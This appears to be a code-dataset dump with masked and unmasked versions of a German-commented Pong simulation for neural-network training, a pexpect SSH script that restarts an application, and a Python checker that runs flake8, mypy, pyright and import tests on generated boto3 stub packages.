random.random()])\n\n # Rücksetzen der Anzahl der Schlägertreffer (__init__)\n self.bouncecount = 0\n\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n\n\n def __sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, Y-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax\n\n\n def __sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, Schlägerposition von Spieler[Player]\n \"\"\"\n return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax\n\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von 
Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player) ) / self.y_max\n\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n\n 
#########################\n ### Initialisierungen ###\n #########################\n\n # Setzt den Ball eine Position weiter.\n # Die Schrittweite wird durch den Faktor self.speed gesetzt, der den Einheitsvektor dirVec skaliert\n self.posVec += self.dirVec * self.speed\n\n # Hat der Schläger den Ball getroffen?\n # bathit[0] -> linker Schläger\n # bathit[1] -> rechter Schläger\n self._bathit = [False, False]\n self._out = [False, False]\n\n ###################\n ### Anweisungen ###\n ###################\n\n # Falls 10 oder mehr Treffer also jeder mindestens 5x getroffen hat, dann wird abgebrochen\n # und neu gestartet, damit die aktuelle Endlosschleife unterbrochen wird. Hier würde das KNN\n # sonst nichts Neues mehr lernen.\n if self.bouncecount > 10:\n self.__initvectors()\n\n # Abprallen an der Unterseite bei Y = 0\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n \n # Abprallen an der Oberseite bei Y = y_max (hier vermutlich 9)\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n \n # Prüfe auf Treffer auf der linken Seite (Spieler 0)\n self.__tickBounceLeft()\n \n # Prüfe auf Treffer auf der rechten Seite (Spieler 1)\n self.__tickBounceRight()\n\n\n def __tickBounceLeft(self):\n \"\"\"\n Checken, ob der Ball links bei Spieler 0 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n\n :return: void\n \"\"\"\n\n # Wenn der Ortsvektor kleiner ist als 0, dann hat er die Torauslinie von Spieler 0 überschritten\n if self.posVec[0] < 0:\n\n # Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact)\n # auf der Linie von Spieler 0 (Y = 0)\n\n factor = (0 - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + (factor * self.dirVec)\n\n self.poi[0] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. 
scaled_sensor_err(player)\n\n # Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...\n if (poi[1] > self.bat[0] - self.batsize) and (poi[1] < self.bat[0] + self.batsize):\n self._bathit[0] = True # ... vermerke dies für z.B. hitbat(player)\n else: # wenn jedoch nicht, dann...\n self.Points[1] += 1 # ... Punkte von Spieler 1 (rechts) erhöhen\n self._out[0] = True # und merken, das der Ball außerhalb des Spielfelds\n # war, z.B. für out(player)\n\n # Ball abprallen lassen, falls:\n # -> Infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition\n # -> Der Schläger den Ball getroffen hat\n if self.infinite or self._bathit[0]:\n self.posVec[0] *= -1.0 # Einfallswinklel = Ausfallswinkel\n self.dirVec[0] *= -1.0\n\n self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten\n else:\n self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.\n self.bouncecount = 0\n\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n # Wenn der Ortsvektor größer ist als x_max (hier vermutlich 16), dann hat er die Torauslinie\n # von Spieler 1 überschritten\n if self.posVec[0] > self.x_max:\n\n # Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact) auf der Linie von\n # Spieler (Y = self.x_max)\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + (factor * self.dirVec)\n\n self.poi[1] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. scaled_sensor_err(player)\n\n # Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1] + self.batsize:\n self._bathit[1] = True # ... vermerke dies für z.B. hitbat(player)\n else: # wenn jedoch nicht, dann...\n self.Points[0] += 1 # ... 
Punkte von Spieler 0 (links) erhöhen\n self._out[1] = True # und merken, das der Ball außerhalb des Spielfelds\n # war, z.B. für out(player)\n\n # Ball abprallen lassen, falls:\n # -> Das infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition\n # -> Der Schläger den Ball getroffen hat\n if self.infinite or self._bathit[1]:\n # 2 Spielfeldlängen - aktuellem X-Betrag ergibt neue X-Position\n self.posVec[0] = 2 * self.x_max - self.posVec[0] # Einfallswinklel = Ausfallswinkel\n self.dirVec[0] *= -1.0\n\n self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten\n else:\n self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.\n self.bouncecount = 0\n\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n\n # Wenn ein String, dann im Befehls-Modus:\n if type(action) == str:\n\n # Den Schläger nach oben bewegen\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde\n self.bat[player] = self.y_max\n\n # Den Schläger nach unten bewegen\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde\n self.bat[player] = 0.0\n\n # Sonst im Setzen-Modus:\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2 # Der Schläger wird direkt auf 
die gewünschte Position gesetzt\n if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde\n self.bat[player] = self.y_max\n\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n\n\n def v_getPoint(self):\n \"\"\"\n visu-getter\n\n :return: Liste [X,Y] des Punktestundes für Spieler 0 / 1\n \"\"\"\n return self.Points",
"step-ids": [
20,
21,
23,
26,
29
]
}
|
[
20,
21,
23,
26,
29
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s.login(ip, username, password)
print('SSH session login successful')
s.sendline('application stop')
s.prompt()
print('Stopping the app')
print("""
Starting the app""")
s.sendline('application start')
s.prompt()
print('\nLogout')
s.logout()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = pxssh.pxssh()
ip = ''
username = ''
password = ''
s.login(ip, username, password)
print('SSH session login successful')
s.sendline('application stop')
s.prompt()
print('Stopping the app')
print("""
Starting the app""")
s.sendline('application start')
s.prompt()
print('\nLogout')
s.logout()
<|reserved_special_token_1|>
from pexpect import pxssh
import time
s = pxssh.pxssh()
ip = ''
username = ''
password = ''
s.login(ip, username, password)
print('SSH session login successful')
s.sendline('application stop')
s.prompt()
print('Stopping the app')
print("""
Starting the app""")
s.sendline('application start')
s.prompt()
print('\nLogout')
s.logout()
<|reserved_special_token_1|>
#!/usr/bin/env python3
from pexpect import pxssh
import time
s = pxssh.pxssh()
ip = "" #replace ip address
username= "" #replace username
password= "" #replace password
s.login (ip, username, password)
print ("SSH session login successful")
s.sendline ('application stop')
s.prompt() # match the prompt
print("Stopping the app")
print("\nStarting the app")
s.sendline ('application start')
s.prompt()
print ("\nLogout")
s.logout()
|
flexible
|
{
"blob_id": "dd9574ea08beb9bc5f1413afd63c751fd42cba67",
"index": 6406,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ns.login(ip, username, password)\nprint('SSH session login successful')\ns.sendline('application stop')\ns.prompt()\nprint('Stopping the app')\nprint(\"\"\"\nStarting the app\"\"\")\ns.sendline('application start')\ns.prompt()\nprint('\\nLogout')\ns.logout()\n",
"step-3": "<mask token>\ns = pxssh.pxssh()\nip = ''\nusername = ''\npassword = ''\ns.login(ip, username, password)\nprint('SSH session login successful')\ns.sendline('application stop')\ns.prompt()\nprint('Stopping the app')\nprint(\"\"\"\nStarting the app\"\"\")\ns.sendline('application start')\ns.prompt()\nprint('\\nLogout')\ns.logout()\n",
"step-4": "from pexpect import pxssh\nimport time\ns = pxssh.pxssh()\nip = ''\nusername = ''\npassword = ''\ns.login(ip, username, password)\nprint('SSH session login successful')\ns.sendline('application stop')\ns.prompt()\nprint('Stopping the app')\nprint(\"\"\"\nStarting the app\"\"\")\ns.sendline('application start')\ns.prompt()\nprint('\\nLogout')\ns.logout()\n",
"step-5": "#!/usr/bin/env python3\n\nfrom pexpect import pxssh\nimport time\ns = pxssh.pxssh()\nip = \"\" #replace ip address\nusername= \"\" #replace username\npassword= \"\" #replace password\ns.login (ip, username, password)\nprint (\"SSH session login successful\")\ns.sendline ('application stop')\ns.prompt() # match the prompt\nprint(\"Stopping the app\")\n\nprint(\"\\nStarting the app\") \ns.sendline ('application start')\ns.prompt() \nprint (\"\\nLogout\")\ns.logout()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
"""
Checker of generated packages.
- [x] import generated package
- [x] flake8
- [x] pyright
- [x] mypy
"""
import argparse
import json
import logging
import subprocess
import sys
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional
# Repository root: two directory levels above this script.
ROOT_PATH = Path(__file__).parent.parent.resolve()
# Name of the logger configured by setup_logging() and used by all checks.
LOGGER_NAME = "check_output"
# Substrings of pyright diagnostic messages that are known/accepted;
# any diagnostic containing one of these is not treated as a failure.
IGNORE_PYRIGHT_ERRORS = (
    '"get_paginator" is marked as overload, but no implementation is provided',
    '"get_waiter" is marked as overload, but no implementation is provided',
    # 'Expected type arguments for generic class "ResourceCollection"',
    # 'Type "None" cannot be assigned to type',
    # '"__next__" is not present',
    # 'Import "boto3.s3.transfer" could not be resolved',
    # "is partially unknown",
    'Method "paginate" overrides class "Paginator" in an incompatible manner',
    'Method "wait" overrides class "Waiter" in an incompatible manner',
    'define variable "items" in incompatible way',
    'define variable "values" in incompatible way',
    "must return value",
    'Import "types_aiobotocore_',
    'Import "mypy_boto3_',
)
# Substrings of mypy output lines that are known/accepted; any line
# containing one of these is not treated as a failure.
IGNORE_MYPY_ERRORS = (
    'Signature of "create_client" incompatible with supertype "Session"',
    'Signature of "paginate" incompatible with supertype "Paginator"',
    'Signature of "wait" incompatible with supertype "Waiter"',
    "note:",
)
class SnapshotMismatchError(Exception):
    """
    Main snapshot mismatch exception.

    Raised when a generated package fails one of the checks run by this
    script (flake8, mypy, pyright, run, or install/import).
    """
def setup_logging(level: int) -> logging.Logger:
    """
    Configure and return the script logger.

    Arguments:
        level -- Log level applied to both the logger and its stream handler.

    Returns:
        The configured logger instance.
    """
    handler = logging.StreamHandler()
    handler.setFormatter(
        logging.Formatter("%(levelname)s %(message)s", datefmt="%H:%M:%S")
    )
    handler.setLevel(level)

    logger = logging.getLogger(LOGGER_NAME)
    logger.addHandler(handler)
    logger.setLevel(level)
    return logger
@dataclass
class CLINamespace:
    """
    CLI namespace.

    Parsed command-line options for this script; see parse_args().
    """

    # Enable debug-level logging (-d/--debug).
    debug: bool
    # Directory containing the generated *_package folders (-p/--path).
    path: Path
    # Optional substrings; only folders whose path contains one are checked.
    filter: List[str]
    # Stop after the first failing package instead of checking all of them.
    exit_on_error: bool
def parse_args() -> CLINamespace:
    """
    Parse CLI arguments into a CLINamespace.
    """
    parser = argparse.ArgumentParser(__file__)
    parser.add_argument("-d", "--debug", action="store_true")
    parser.add_argument("-x", "--exit-on-error", action="store_true")
    parser.add_argument(
        "-p", "--path", type=Path, default=ROOT_PATH / "mypy_boto3_output"
    )
    parser.add_argument("filter", nargs="*")
    namespace = parser.parse_args()
    return CLINamespace(
        debug=namespace.debug,
        path=namespace.path,
        filter=namespace.filter,
        exit_on_error=namespace.exit_on_error,
    )
def run_flake8(path: Path) -> None:
    """
    Check output with flake8.

    Arguments:
        path -- Path to the generated package directory.

    Raises:
        SnapshotMismatchError -- If flake8 exits non-zero; the message is
            flake8's combined stdout/stderr output.
    """
    # Capture output directly instead of spooling through a temporary file.
    # The original NamedTemporaryFile dance was unnecessary and cannot be
    # re-read by path on Windows while the file is still open.
    result = subprocess.run(
        [
            sys.executable,
            "-m",
            "flake8",
            "--ignore",
            "E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803",
            path.as_posix(),
        ],
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        encoding="utf8",
    )
    if result.returncode != 0:
        raise SnapshotMismatchError(result.stdout)
def run_pyright(path: Path) -> None:
    """
    Check output with pyright.

    Arguments:
        path -- Path to the generated package directory.

    Raises:
        SnapshotMismatchError -- If pyright reports any diagnostic whose
            message does not match IGNORE_PYRIGHT_ERRORS.
    """
    # Capture stdout directly instead of spooling through a temporary file;
    # stderr is discarded as before.
    result = subprocess.run(
        ["npx", "pyright", path.as_posix(), "--outputjson"],
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        encoding="utf8",
    )
    if result.returncode == 0:
        return

    # pyright's --outputjson payload carries diagnostics under
    # "generalDiagnostics".
    data = json.loads(result.stdout).get("generalDiagnostics", [])
    errors = [
        error
        for error in data
        if not any(imsg in error.get("message", "") for imsg in IGNORE_PYRIGHT_ERRORS)
    ]
    if errors:
        messages = [
            f'{error["file"]}:{error["range"]["start"]["line"]} {error.get("message", "")}'
            for error in errors
        ]
        raise SnapshotMismatchError("\n".join(messages))
def run_mypy(path: Path) -> None:
    """
    Check output with mypy.

    Raises:
        SnapshotMismatchError -- If mypy emits any line that is non-empty,
            is not the "Found ..." summary, and does not match
            IGNORE_MYPY_ERRORS.
    """
    try:
        output = subprocess.check_output(
            [sys.executable, "-m", "mypy", path.as_posix()],
            stderr=subprocess.STDOUT,
            encoding="utf8",
        )
    except subprocess.CalledProcessError as e:
        # mypy exits non-zero when it finds errors; its findings are still
        # on stdout, so keep them for filtering.
        output = e.output

    errors = [
        line
        for line in output.splitlines()
        if line
        and not line.startswith("Found")
        and not any(imsg in line for imsg in IGNORE_MYPY_ERRORS)
    ]
    if errors:
        raise SnapshotMismatchError("\n".join(errors)) from None
def run_call(path: Path) -> None:
    """
    Check output by running it.

    Skipped entirely when the package has no ``__main__.py``.

    Raises:
        SnapshotMismatchError -- If executing the package fails.
    """
    main_module = path / "__main__.py"
    if not main_module.exists():
        return
    try:
        subprocess.check_call(
            [sys.executable, path.as_posix()],
            stdout=subprocess.DEVNULL,
        )
    except subprocess.CalledProcessError as e:
        raise SnapshotMismatchError(f"Path {path} cannot be imported: {e}") from None
def run_import(path: Path) -> None:
    """
    Check output by installing and importing it.

    Installs the parent project with pip, imports the package by name, then
    uninstalls it. Skipped entirely when the package has no ``__main__.py``.

    Arguments:
        path -- Path to the generated package directory.

    Raises:
        SnapshotMismatchError -- If any pip or import step fails.
    """
    if not (path / "__main__.py").exists():
        return
    try:
        subprocess.check_call(
            [sys.executable, "-m", "pip", "install", "--no-input", path.parent.as_posix()],
            stdout=subprocess.DEVNULL,
        )
        # The guard above already established that __main__.py exists, so
        # the import check always runs; the original inner re-check of the
        # same condition was redundant and has been removed.
        subprocess.check_call(
            [sys.executable, "-c", f"import {path.name}"],
            stdout=subprocess.DEVNULL,
        )
        subprocess.check_call(
            [sys.executable, "-m", "pip", "uninstall", "--no-input", "-y", path.name],
            stdout=subprocess.DEVNULL,
        )
    except subprocess.CalledProcessError as e:
        raise SnapshotMismatchError(f"Path {path} cannot be imported: {e}") from None
def is_package_dir(path: Path) -> bool:
    """
    Check whether `path` contains a service package.

    A service package is a directory whose name is not an ``.egg-info``
    folder and that contains an ``__init__.pyi`` stub.
    """
    return (
        path.is_dir()
        and not path.name.endswith(".egg-info")
        and (path / "__init__.pyi").exists()
    )
def check_snapshot(path: Path) -> None:
    """
    Check package type checkers snapshot.

    Runs flake8, mypy and pyright over the package; when the package has a
    ``__main__.py`` it is also executed and install-imported.

    Raises:
        SnapshotMismatchError -- If snapshot is not equal to current output.
    """
    logger = logging.getLogger(LOGGER_NAME)
    static_checks = (
        ("flake8", run_flake8),
        ("mypy", run_mypy),
        ("pyright", run_pyright),
    )
    for check_name, check in static_checks:
        logger.debug(f"Running {check_name} for {path.name} ...")
        check(path)
    if (path / "__main__.py").exists():
        for check_name, check in (("call", run_call), ("import", run_import)):
            logger.debug(f"Running {check_name} for {path.name} ...")
            check(path)
def find_package_path(path: Path) -> Optional[Path]:
    """
    Find package directory inside `path`.

    Returns:
        The first child directory that is a service package, or None when
        no such directory exists.
    """
    return next(
        (child for child in path.iterdir() if is_package_dir(child)),
        None,
    )
def main() -> None:
    """
    Run main logic.

    Iterates over generated ``*_package`` folders, checks each discovered
    package, and exits with status 1 if any check failed.
    """
    cli = parse_args()
    logger = setup_logging(logging.DEBUG if cli.debug else logging.INFO)
    failed = False
    for candidate in sorted(cli.path.iterdir()):
        if not candidate.name.endswith("_package"):
            continue
        # An explicit filter list restricts which folders are checked.
        if cli.filter and not any(part in candidate.as_posix() for part in cli.filter):
            continue
        package_path = find_package_path(candidate)
        if not package_path:
            continue
        logger.info(f"Checking {candidate.name}/{package_path.name} ...")
        try:
            check_snapshot(package_path)
        except SnapshotMismatchError as e:
            logger.error(e)
            failed = True
            if cli.exit_on_error:
                break
    if failed:
        sys.exit(1)
# Script entry point: run the checker when invoked directly.
if __name__ == "__main__":
    main()
|
normal
|
{
"blob_id": "f3466fd38ecf472a4342aad4d10410d6f2a67d47",
"index": 1779,
"step-1": "<mask token>\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\n<mask token>\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n 
f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\n<mask token>\n\n\ndef run_call(path: Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n '--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for 
{path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\ndef run_flake8(path: Path) ->None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call([sys.executable, '-m', 'flake8',\n '--ignore',\n 'E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803'\n , path.as_posix()], stderr=f, stdout=f)\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, 
